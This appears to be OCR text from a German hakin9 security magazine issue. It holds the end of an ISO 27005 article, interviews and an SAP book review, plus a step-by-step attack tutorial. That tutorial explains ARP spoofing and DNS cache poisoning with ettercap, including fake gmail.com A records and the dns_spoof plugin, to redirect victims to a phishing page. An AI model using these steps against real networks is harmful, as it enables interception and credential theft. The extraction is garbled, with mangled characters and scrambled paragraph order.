Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
